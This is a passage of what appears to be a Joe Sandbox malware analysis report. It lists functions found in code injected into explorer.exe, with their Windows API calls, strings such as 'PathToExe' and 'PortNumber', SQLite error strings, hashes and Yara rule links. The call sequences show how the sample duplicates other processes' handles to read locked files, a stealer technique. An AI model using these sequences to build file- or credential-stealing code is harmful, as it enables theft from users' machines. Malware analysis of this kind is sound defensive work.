                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID: winDelete
                                                                                                                                        • API String ID: 3188754299-3936022152
                                                                                                                                        • Opcode ID: 63c0095ae49b3290db55ccb4b3f65058a951121a8f4638c4c7f4a52e37c46213
                                                                                                                                        • Instruction ID: 50b8387e8b343e317420c172dd21f20e8f662194b79f7e5aeb5092005e0ccd99
                                                                                                                                        • Opcode Fuzzy Hash: 63c0095ae49b3290db55ccb4b3f65058a951121a8f4638c4c7f4a52e37c46213
                                                                                                                                        • Instruction Fuzzy Hash: 7B110831E00A28EB9B12AB78C855D7DF776DB81768F105629EC06E728CDBF09901CB52
                                                                                                                                        Function 02752EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751011: GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
                                                                                                                                          • Part of subcall function 02751011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 02752EE4
                                                                                                                                        • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02752F54
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 02752F62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1066184869-0
                                                                                                                                        • Opcode ID: 3e5f9449f18d186f71ab9ca5cb5fbd1ba62fdf30f40601ac7113e207e0e95ba1
                                                                                                                                        • Instruction ID: 0c9dfd2da33a507fb95c6feb8707ef2c8b2e5556d11f095d36070666d72cb37e
                                                                                                                                        • Opcode Fuzzy Hash: 3e5f9449f18d186f71ab9ca5cb5fbd1ba62fdf30f40601ac7113e207e0e95ba1
                                                                                                                                        • Instruction Fuzzy Hash: 01014F31244260AB8A16AB21DC08E6FBBAAEFC5351B05442DFC5DA2180DB758955DBA1
                                                                                                                                        Function 02754B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitInitializeProcessUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4175140541-0
                                                                                                                                        • Opcode ID: 6771aa9b63f293ca7a4cfa3370bc010133382d742e1dd9b9a59c3e0b6527f419
                                                                                                                                        • Instruction ID: 4c596b9c6cb6269d47245c00fcae6c26bf9f1aa63aed505947c33496ab21807a
                                                                                                                                        • Opcode Fuzzy Hash: 6771aa9b63f293ca7a4cfa3370bc010133382d742e1dd9b9a59c3e0b6527f419
                                                                                                                                        • Instruction Fuzzy Hash: C0C04C35B841105BEE802FE09C1D70A7A59AB80B23F088804F605C50C0DBB040518A26
                                                                                                                                        Function 02759FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • HeapCreate.KERNEL32(00000000,00BD0000,00000000), ref: 02759FF8
                                                                                                                                        Strings
                                                                                                                                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0275A00E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHeap
                                                                                                                                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                        • API String ID: 10892065-982776804
                                                                                                                                        • Opcode ID: 0f721904734d532599e2da97b1f5ff61cf8c5a0d62a3fb05e6704fd9b7129f5e
                                                                                                                                        • Instruction ID: ea15d8042f81026be6a93536d8e3c67af0c6f1453c92cdea9e75cbde25cf03c1
                                                                                                                                        • Opcode Fuzzy Hash: 0f721904734d532599e2da97b1f5ff61cf8c5a0d62a3fb05e6704fd9b7129f5e
                                                                                                                                        • Instruction Fuzzy Hash: B8F04672A44320FAE7311950EC88F27E79CDF8A785F108829FE4A96180F3F16C018370
                                                                                                                                        Function 02751AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02752E83,PathToExe,00000000,00000000), ref: 02751B16
                                                                                                                                          • Part of subcall function 02751011: GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
                                                                                                                                          • Part of subcall function 02751011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
                                                                                                                                          • Part of subcall function 027519E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A1E
                                                                                                                                          • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A3C
                                                                                                                                          • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A75
                                                                                                                                          • Part of subcall function 027519E5: RegCloseKey.KERNEL32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A98
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 02751B40
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                        • API String ID: 2162223993-2036018995
                                                                                                                                        • Opcode ID: 1c1dd1d0e0f46b0970c786d5d7f381068317c9f26e116cd2b970042b6b2ddd80
                                                                                                                                        • Instruction ID: b5df2ba60f480ff833ab296bc577deada3aa238c5decad8f0e4d544991030406
                                                                                                                                        • Opcode Fuzzy Hash: 1c1dd1d0e0f46b0970c786d5d7f381068317c9f26e116cd2b970042b6b2ddd80
                                                                                                                                        • Instruction Fuzzy Hash: B5F0B426B40AAC17D612692ACC98F67B74FCBC12A73974129FC1DA3241EE62AC015664
                                                                                                                                        Function 0275A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0275A35F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        • String ID: winSeekFile
                                                                                                                                        • API String ID: 973152223-3168307952
                                                                                                                                        • Opcode ID: d0cc58a5c2200997027a21a4533b593a12fcaa661148862845cc260693df2447
                                                                                                                                        • Instruction ID: 617b23b12c47ccd62d69c4724c3611148c3153e72d111ce08df5533b0cdb492a
                                                                                                                                        • Opcode Fuzzy Hash: d0cc58a5c2200997027a21a4533b593a12fcaa661148862845cc260693df2447
                                                                                                                                        • Instruction Fuzzy Hash: 1AF0B430A14204AFE7129F74DC00EBBBBAAEB45321B50C779FC65D62D0DB70DD1096A0
                                                                                                                                        Function 02759EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(04C60000,00000000,?), ref: 02759EB5
                                                                                                                                        Strings
                                                                                                                                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 02759ECD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                                        • API String ID: 1279760036-667713680
                                                                                                                                        • Opcode ID: 26b833c7da55f6b840b1356eed0faa64db266364c8452eecef5f7ec02d368a4c
                                                                                                                                        • Instruction ID: 3808ecc049af5adc8014c2eaa29c21a3386119afd933facd64b09bb850d1a33a
                                                                                                                                        • Opcode Fuzzy Hash: 26b833c7da55f6b840b1356eed0faa64db266364c8452eecef5f7ec02d368a4c
                                                                                                                                        • Instruction Fuzzy Hash: 61E0C273A84220BBD2132684AC14F2FFB69DBC6F20F058815FE05A6240C270A82287B6
                                                                                                                                        Function 02759EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(04C60000,00000000,?), ref: 02759EF8
                                                                                                                                        Strings
                                                                                                                                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 02759F0E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                                        • API String ID: 3298025750-4030396798
                                                                                                                                        • Opcode ID: c64284a9fd136fb0cf5913fbe95090736d5b17ea9512000da96d32d284e527a9
                                                                                                                                        • Instruction ID: 6222a20f986d98b421652659b60670dbfd53852c96c1f0953e01d2eecff65896
                                                                                                                                        • Opcode Fuzzy Hash: c64284a9fd136fb0cf5913fbe95090736d5b17ea9512000da96d32d284e527a9
                                                                                                                                        • Instruction Fuzzy Hash: 9AD01273548201F7D6025A54DC15F2FFB799B96B00F444819FA1595095D3B06061ABB5
                                                                                                                                        Function 02751B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02751B8F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3498533004-0
                                                                                                                                        • Opcode ID: 2336bdc0fd7822eb3a980d111c6d1d6ae461eef26ee5a9ac3ee8c0382889f5d6
                                                                                                                                        • Instruction ID: 8a12abdf6043bca9a813dc0395ddfda5db317487093b3f0bfdfa279fb001dd0c
                                                                                                                                        • Opcode Fuzzy Hash: 2336bdc0fd7822eb3a980d111c6d1d6ae461eef26ee5a9ac3ee8c0382889f5d6
                                                                                                                                        • Instruction Fuzzy Hash: 2ED05B71653A3062D97516397C0DFE7AF1CDF435BAB484A14F81DD50C0E36489D781E0
                                                                                                                                        Function 02751011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0275116F
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2580854192-0
                                                                                                                                        • Opcode ID: bd42d260c2b88de9d49a8ccf553d10ca3064d87a065ed646ec7faeb384370a55
                                                                                                                                        • Instruction ID: 64efc70736405f23b707598e3d47bb8925fdedc7e98492616949b0cc730649b8
                                                                                                                                        • Opcode Fuzzy Hash: bd42d260c2b88de9d49a8ccf553d10ca3064d87a065ed646ec7faeb384370a55
                                                                                                                                        • Instruction Fuzzy Hash: 14C04C71D4527056CD6027A4B90CBCA6F1DDF89277F494881B90AA7185CAB6885186A0
                                                                                                                                        Function 02751000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                        • Opcode ID: cb6c29a6a2a03ec6b674eb53d300dd142b0509fd5759fe6821104598c1c669f0
                                                                                                                                        • Instruction ID: e3a85956634a2a90017c169d36d0cf41ae616b83f7e44ccac076308a41ca43a0
                                                                                                                                        • Opcode Fuzzy Hash: cb6c29a6a2a03ec6b674eb53d300dd142b0509fd5759fe6821104598c1c669f0
                                                                                                                                        • Instruction Fuzzy Hash: 8DA002B5D901045BDD4457A4DA0DA1A3D1CF7C4712F148944715686081D97454148721
                                                                                                                                        Function 027512A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 027512B5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryZero
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 816449071-0
                                                                                                                                        • Opcode ID: ca2aeefa75c0287ededb453615f5d72916c6f0f1d6ff947d587cf8c82d3bf479
                                                                                                                                        • Instruction ID: fdf87fa5490d98798fbc4089ada11ad3367b28f77ec8a72ba1fa4a3afd3965ea
                                                                                                                                        • Opcode Fuzzy Hash: ca2aeefa75c0287ededb453615f5d72916c6f0f1d6ff947d587cf8c82d3bf479
                                                                                                                                        • Instruction Fuzzy Hash: A11125B5F01219AFDB10DFA8E884ABFBBBCEB48211B048429FD49E3240D770D900CB60
                                                                                                                                        Function 02751B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,02752C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02751BAA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 9870c40de46f0bc0ffa7d582ddaa423b981e3cad6f09215ab01b58ad84cbe904
                                                                                                                                        • Instruction ID: 5ca12d835557ebcf2ea77bbf68a2413104f2f897b3fdec4ac53594cd1ae80ed7
                                                                                                                                        • Opcode Fuzzy Hash: 9870c40de46f0bc0ffa7d582ddaa423b981e3cad6f09215ab01b58ad84cbe904
                                                                                                                                        • Instruction Fuzzy Hash: F7D0A933E02832828A64563C3808A92E2806A4057E39A07B4FC2AF30C0E368CC8282C0
                                                                                                                                        Function 02751677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02751684
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateGlobalStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2244384528-0
                                                                                                                                        • Opcode ID: a1c8798e5c564a21bb05df6ecdf8341008223bd68a12d37da6238fff50187630
                                                                                                                                        • Instruction ID: 471c046953e4042467477eeb72f1c570410824e9a5230cd2afa69c7d29b2569a
                                                                                                                                        • Opcode Fuzzy Hash: a1c8798e5c564a21bb05df6ecdf8341008223bd68a12d37da6238fff50187630
                                                                                                                                        • Instruction Fuzzy Hash: 27C08C31560231EFEB301A308C09B8676D8EF09BB3F0A0D29E4C5DD0C0E6F408C0CA90
                                                                                                                                        Function 0275104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,0275158A), ref: 02751056
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 606b52829f015f1366746f68aadf3e01504631893eb28b85f014c5f836ad7cf6
                                                                                                                                        • Instruction ID: 3aaa514193f8c175e3bab3b12ddc75f4d96b4a1eccfb16f54197e0f16d68302b
                                                                                                                                        • Opcode Fuzzy Hash: 606b52829f015f1366746f68aadf3e01504631893eb28b85f014c5f836ad7cf6
                                                                                                                                        • Instruction Fuzzy Hash: D5A002F0BD57007AFD695762AE1FF26293C9780F12F144644B30D7C0C055F47550892D
                                                                                                                                        Function 0275105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,02754A5B,?,?,00000000,?,?,?,?,02754B66,?), ref: 02751065
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: c67c4e13e641f7aa4d68bfe988c8288f795e0814e8487b39d07904d14dc881d2
                                                                                                                                        • Instruction ID: 2123a57cf4cee8c595e497d613daa3d5d6a15ef8c0247a29904073925ba58b4c
                                                                                                                                        • Opcode Fuzzy Hash: c67c4e13e641f7aa4d68bfe988c8288f795e0814e8487b39d07904d14dc881d2
                                                                                                                                        • Instruction Fuzzy Hash: 87A002B0ED070066EDB457209D0EF052A18A780B11F2489447251A90C159B5E0548A18

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 0275349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 027534C0
                                                                                                                                          • Part of subcall function 027533C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 02753401
                                                                                                                                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,027537A8), ref: 027534E9
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0275351E
                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02753541
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 02753586
                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0275358F
                                                                                                                                        • lstrcmpiW.KERNEL32(00000000,File), ref: 027535B6
                                                                                                                                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 027535DE
                                                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 027535F6
                                                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02753606
                                                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0275361E
                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 02753631
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02753658
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0275366B
                                                                                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 02753681
                                                                                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 027536AD
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 027536C0
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,027537A8), ref: 027536F5
                                                                                                                                          • Part of subcall function 02751C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02751CC0
                                                                                                                                          • Part of subcall function 02751C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02751CDA
                                                                                                                                          • Part of subcall function 02751C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02751CE6
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,027537A8), ref: 02753707
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                                        • String ID: File
                                                                                                                                        • API String ID: 3915112439-749574446
                                                                                                                                        • Opcode ID: 79b44400c3221957b2e800844e7033d3b202113bdac8c51b3f78b97bc117e75b
                                                                                                                                        • Instruction ID: 448d308be16d556d318f87ed39ce27eab9b9019b254a9953a63ea0d3bfbbbe07
                                                                                                                                        • Opcode Fuzzy Hash: 79b44400c3221957b2e800844e7033d3b202113bdac8c51b3f78b97bc117e75b
                                                                                                                                        • Instruction Fuzzy Hash: 81619F70A44311AFDB119F20CC88F2BBBE9EF847A5F04492CFD46A62A0DBB5D9548F51
                                                                                                                                        Function 027A4438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 027A4502
                                                                                                                                        • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 027A475F
                                                                                                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 027A4803
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp$memcpy
                                                                                                                                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                        • API String ID: 231171946-1096842476
                                                                                                                                        • Opcode ID: bc17aa7b42fdac72c92bd5d104c2c36261e965e27386fce58d328d03a647acd6
                                                                                                                                        • Instruction ID: ef5929a2f1edc2b3d245a6c44a5ad52ae9241d49bcf3fb96edc1090622586f38
                                                                                                                                        • Opcode Fuzzy Hash: bc17aa7b42fdac72c92bd5d104c2c36261e965e27386fce58d328d03a647acd6
                                                                                                                                        • Instruction Fuzzy Hash: F9C1F171A083929BDB35CF2884B477BB7E2AFC5338F04062EE8D697241D7A6D445CB42
                                                                                                                                        Function 02775F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02756AAA: memset.NTDLL ref: 02756AC5
                                                                                                                                        • memset.NTDLL ref: 02775F53
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                        • API String ID: 2221118986-594550510
                                                                                                                                        • Opcode ID: 9fc1b8364bd1eda483a326e9c7ef932992c3cad32f76cd16e36a4edc2bd915d7
